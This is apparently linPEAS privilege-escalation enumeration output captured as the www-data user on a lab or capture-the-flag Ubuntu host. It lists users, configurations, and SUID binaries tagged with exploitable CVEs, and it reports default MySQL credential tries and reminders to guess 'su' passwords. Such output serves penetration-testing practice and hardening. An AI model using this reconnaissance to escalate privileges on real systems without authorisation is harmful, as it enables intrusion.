═══════════════════════════════╣ Users Information ╠═══════════════════════════════      
                               ╚═══════════════════╝                                     
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                 
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                    

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                             
netpgpkeys Not Found
netpgp Not Found                                                                         
                                                                                         
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
                                                                                         
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens   
ptrace protection is enabled (1)                                                         

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                        
                                                                                         
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                          

╔══════════╣ Users with console
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash                                         
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                   
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(maria) gid=1000(maria) groups=1000(maria),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)                                            
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=110(mysql) gid=117(mysql) groups=117(mysql)
uid=111(lightdm) gid=118(lightdm) groups=118(lightdm)
uid=112(pulse) gid=121(pulse) groups=121(pulse),29(audio)
uid=113(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 10:34:53 up  1:18,  0 users,  load average: 0.21, 0.06, 0.02                            
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
                                                                                         
wtmp begins Wed Jan  3 09:22:08 2024

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                        
root             tty1                      Tue Jan  4 20:35:20 +0100 2022
maria            tty1                      Tue Jul 13 10:40:22 +0200 2021

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)                           
                                                                                         
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!                                                                        
                                                                                         


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════       
                             ╚══════════════════════╝                                    
╔══════════╣ Useful software
/usr/bin/base64                                                                          
/usr/bin/curl
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  gcc                                4:5.3.1-1ubuntu1                           amd64        GNU C compiler
ii  gcc-5                              5.4.0-6ubuntu1~16.04.4                     amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.18, for Linux (x86_64) using  EditLine wrapper              


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No                               
═╣ MySQL connection using root/NOPASS ................. No                               
                                                                                         
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user              = mysql          
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/

╔══════════╣ Analyzing MariaDB Files (limit 70)
                                                                                         
-rw------- 1 root root 317 May 16  2017 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found                                                        
httpd Not Found                                                                          
                                                                                         
Nginx version: 
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 May 16  2017 /etc/nginx/sites-enabled                        
drwxr-xr-x 2 root root 4096 May 16  2017 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 May 16  2017 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default                                                                     
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        }
}



-rw-r--r-- 1 root root 70575 Mar  2  2017 /etc/php/7.0/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 70918 Mar  2  2017 /etc/php/7.0/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On

-rw-r--r-- 1 root root 401 Apr 26  2016 /etc/init/nginx.conf
description "nginx - small, powerful, scalable web/proxy server"
start on filesystem and static-network-up
stop on runlevel [016]
expect fork
respawn
pre-start script
        [ -x /usr/sbin/nginx ] || { stop; exit 0; }
        /usr/sbin/nginx -q -t -g 'daemon on; master_process on;' || { stop; exit 0; }
end script
exec /usr/sbin/nginx -g 'daemon on; master_process on;'
pre-stop exec /usr/sbin/nginx -s quit
-rw-r--r-- 1 root root 1462 Apr 26  2016 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
events {
        worker_connections 768;
}
http {
        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        include /etc/nginx/mime.types;
        default_type application/octet-stream;
        ssl_prefer_server_ciphers on;
        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;
        gzip on;
        gzip_disable "msie6";
        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}

-rw-r--r-- 1 root root 389 Apr 26  2016 /etc/default/nginx

-rwxr-xr-x 1 root root 4579 Apr 26  2016 /etc/init.d/nginx

-rw-r--r-- 1 root root 329 Apr 26  2016 /etc/logrotate.d/nginx

drwxr-xr-x 6 root root 4096 May 16  2017 /etc/nginx
-rw-r--r-- 1 root root 422 Apr 26  2016 /etc/nginx/snippets/fastcgi-php.conf
fastcgi_split_path_info ^(.+\.php)(/.+)$;
try_files $fastcgi_script_name =404;
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
include fastcgi.conf;
-rw-r--r-- 1 root root 217 Apr 26  2016 /etc/nginx/snippets/snakeoil.conf
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
-rw-r--r-- 1 root root 1462 Apr 26  2016 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
events {
        worker_connections 768;
}
http {
        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        include /etc/nginx/mime.types;
        default_type application/octet-stream;
        ssl_prefer_server_ciphers on;
        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;
        gzip on;
        gzip_disable "msie6";
        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}
-rw-r--r-- 1 root root 1077 Apr 26  2016 /etc/nginx/fastcgi.conf
fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;
fastcgi_param  SCRIPT_NAME        $fastcgi_script_name;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;
fastcgi_param  REQUEST_SCHEME     $scheme;
fastcgi_param  HTTPS              $https if_not_empty;
fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx/$nginx_version;
fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;
fastcgi_param  REDIRECT_STATUS    200;

-rw-r--r-- 1 root root 374 Apr 26  2016 /etc/ufw/applications.d/nginx

-rwxr-xr-x 1 root root 1230448 Oct 27  2016 /usr/sbin/nginx

drwxr-xr-x 2 root root 4096 Jul 13  2021 /usr/share/doc/nginx

drwxr-xr-x 3 root root 4096 Jul 13  2021 /usr/share/nginx

drwxr-xr-x 7 root root 4096 May 16  2017 /var/lib/nginx

drwxr-xr-x 2 root adm 4096 Jan  3 09:22 /var/log/nginx


╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Apr 26  2016 /etc/nginx/fastcgi_params                       

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Sep 30  2013 /usr/share/doc/rsync/examples/rsyncd.conf       
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                     
drwxr-xr-x 2 root root 4096 May 15  2017 /etc/ldap


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)                                              
                                                                                         




-rw-r--r-- 1 root root 602 May 22  2017 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 174 May 22  2017 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 94 May 22  2017 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 394 May 22  2017 /etc/ssh/ssh_host_rsa_key.pub

Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem                                                             
/etc/ssl/certs/ACEDICOM_Root.pem
/etc/ssl/certs/AC_Raíz_Certicámara_S.A..pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AddTrust_External_Root.pem
/etc/ssl/certs/AddTrust_Low-Value_Services_Root.pem
/etc/ssl/certs/AddTrust_Public_Services_Root.pem
/etc/ssl/certs/AddTrust_Qualified_Certificates_Root.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/ApplicationCA_-_Japanese_Government.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_CA_1.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig.pem
4136PSTORAGE_CERTSBIN

══╣ Some home ssh config file was found
/usr/share/doc/openssh-client/examples/sshd_config                                       
AuthorizedKeysFile      .ssh/authorized_keys
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                         


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 22  2017 /etc/pam.d                                      
-rw-r--r-- 1 root root 2133 Mar 16  2017 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open


╔══════════╣ Passwords inside pam.d
/etc/pam.d/lightdm:auth    sufficient      pam_succeed_if.so user ingroup nopasswdlogin  



╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions   
tmux 2.1                                                                                 


/tmp/tmux-33
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May 15  2017 /usr/share/keyrings                             
drwxr-xr-x 2 root root 4096 May 15  2017 /var/lib/apt/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                           
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                             
gpg Not Found
netpgpkeys Not Found                                                                     
netpgp Not Found                                                                         
                                                                                         
-rw-r--r-- 1 root root 12255 Feb 15  2017 /etc/apt/trusted.gpg
-rw-r--r-- 1 root root 364 May 16  2017 /etc/apt/trusted.gpg.d/ondrej_ubuntu_mysql-5_5.gpg                                                                                        
-rw-r--r-- 1 root root 12335 May 19  2012 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 0 May 19  2012 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 0 Nov 11  2013 /usr/share/keyrings/ubuntu-cloudimage-keyring-removed.gpg
-rw-r--r-- 1 root root 2294 Nov 11  2013 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg                                                                                        
-rw-r--r-- 1 root root 1227 May 19  2012 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2256 Feb 26  2016 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 12335 Feb 15  2017 /var/lib/apt/keyrings/ubuntu-archive-keyring.gpg                                                                                        



╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 694 May 18  2016 /usr/share/bash-completion/completions/postfix   


╔══════════╣ Analyzing FTP Files (limit 70)
                                                                                         


-rw-r--r-- 1 root root 69 Mar  2  2017 /etc/php/7.0/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Mar  2  2017 /usr/share/php7.0-common/common/ftp.ini






╔══════════╣ Analyzing X11 Files (limit 70)
-rw------- 1 maria maria 52 May 16  2017 /home/maria/.Xauthority                         

╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 8655346 Jan  3 10:19 /var/log/nginx/access.log                 

-rw-r----- 1 www-data adm 5086 Jan  3 10:19 /var/log/nginx/error.log

╔══════════╣ Analyzing Windows Files (limit 70)
                                                                                         





















lrwxrwxrwx 1 root root 20 May 16  2017 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 May 16  2017 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 May 16  2017 /var/lib/dpkg/alternatives/my.cnf





























╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Sep  1  2015 /etc/skel/.bashrc                               
-rw-r--r-- 1 maria maria 3771 May 15  2017 /home/maria/.bashrc





-rw-r--r-- 1 root root 655 Jun 24  2016 /etc/skel/.profile
-rw-r--r-- 1 maria maria 655 May 15  2017 /home/maria/.profile



-rw-r--r-- 1 maria maria 0 May 16  2017 /home/maria/.sudo_as_admin_successful



                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════       
                      ╚════════════════════════════════════╝                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
-rwsr-xr-x 1 root root 139K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)                                             
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 31K Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40K May  4  2017 /bin/su
-rwsr-xr-x 1 root root 40K Dec 16  2016 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                           
-rwsr-xr-x 1 root root 44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27K Dec 16  2016 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 134K Jan 20  2017 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                                             
-rwsr-xr-x 1 root root 23K Jan 18  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                                          
-rwsr-xr-x 1 root root 33K May  4  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39K May  4  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 33K May  4  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 74K May  4  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Jan 14  2016 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                    
-rwsr-xr-x 1 root root 53K May  4  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                            
-rwsr-xr-x 1 root root 1.6M May 19  2017 /usr/bin/screen-4.5.0 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 40K May  4  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 49K May  4  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 39K Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42K Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 204K Apr 29  2017 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                
-rwsr-xr-x 1 root root 10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 419K Mar 16  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 15K Jan 18  2016 /usr/lib/policykit-1/polkit-agent-helper-1

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
-rwxr-sr-x 1 root shadow 35K Mar 16  2016 /sbin/unix_chkpwd                              
-rwxr-sr-x 1 root shadow 35K Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root mlocate 39K Nov 18  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 61K May  4  2017 /usr/bin/chage
-rwxr-sr-x 1 root utmp 425K Feb  7  2016 /usr/bin/screen.old (Unknown SGID binary)
-rwxr-sr-x 1 root crontab 36K Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 23K May  4  2017 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 351K Mar 16  2017 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 51K Jan 14  2016 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                    
-rwxr-sr-x 1 root tty 27K Dec 16  2016 /usr/bin/wall
-rwxr-sr-x 1 root utmp 10K Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so                 
/etc/ld.so.conf                                                                          
Content of /etc/ld.so.conf:                                                              
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf                                                            
  - /usr/local/lib                                                                       
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /lib/x86_64-linux-gnu                                                                
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Capabilities                                                                
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities          
══╣ Current shell capabilities                                                           
CapInh:  0x0000000000000000=                                                             
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:  0x0000000000000000=                                                             
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3310 Apr 13  2016 sbin.dhclient                                  
-rw-r--r-- 1 root root   125 Feb  3  2017 usr.bin.lxc-start
-rw-r--r-- 1 root root   281 Jan 31  2017 usr.lib.lxd.lxd-bridge-proxy
-rw-r--r-- 1 root root 14846 Apr 29  2017 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  1550 Apr 27  2017 usr.sbin.mysqld
-rw-r--r-- 1 root root  1527 Jan  5  2016 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1455 Feb 21  2017 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                  
files with acls in searched folders Not Found                                            
                                                                                         
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files        
total 28                                                                                 
drwxr-xr-x   2 root root 4096 May 16  2017 .
drwxr-xr-x 109 root root 4096 Jul 13  2021 ..
-rw-r--r--   1 root root 1557 Apr 14  2016 Z97-byobu.sh
-rw-r--r--   1 root root  101 Jan 14  2017 apps-bin-path.sh
-rw-r--r--   1 root root  663 May 18  2016 bash_completion.sh
-rw-r--r--   1 root root 1003 Dec 29  2015 cedilla-portuguese.sh
-rw-r--r--   1 root root 1941 Mar 16  2016 vte-2.91.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                   
                                                                                         
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                             
═╣ Credentials in fstab/mtab? ........... No                                             
═╣ Can I read shadow files? ............. No                                             
═╣ Can I read shadow plists? ............ No                                             
═╣ Can I write shadow plists? ........... No                                             
═╣ Can I read opasswd file? ............. No                                             
═╣ Can I write in network-scripts? ...... No                                             
═╣ Can I read root folder? .............. No                       
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                   
/home/maria/user.txt
/home/maria/Desktop/user.txt
/root/
/var/www
/var/www/html
/var/www/html/hair.html
/var/www/html/carrie.jpg
/var/www/html/test.html
/var/www/html/bounce.jpg
/var/www/html/sea.jpg
/var/www/html/index.html
/var/www/html/exposed.php

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root root 4 Jan  3 09:17 /run/php/php7.0-fpm.pid                            

╔══════════╣ Readable files belonging to root and readable by me but not world readable
                                                                                         
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)                                                                               
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files        
/dev/mqueue                                                                              
/dev/shm
/run/lock
/run/php
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/alsa-utils.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-byx2did-scsix2d36000c290ce7ceb4b93256b939dfe45afx2dpart2.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-byx2did-wwnx2d0x6000c290ce7ceb4b93256b939dfe45afx2dpart2.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-byx2dpath-pcix2d0000:0b:00.0x2dscsix2d0:0:1:0x2dpart2.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-byx2duuid-c5829712x2d5a18x2d44dfx2da49ax2d15ac3b2e2dda.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-sda2.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ifup@ens160.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
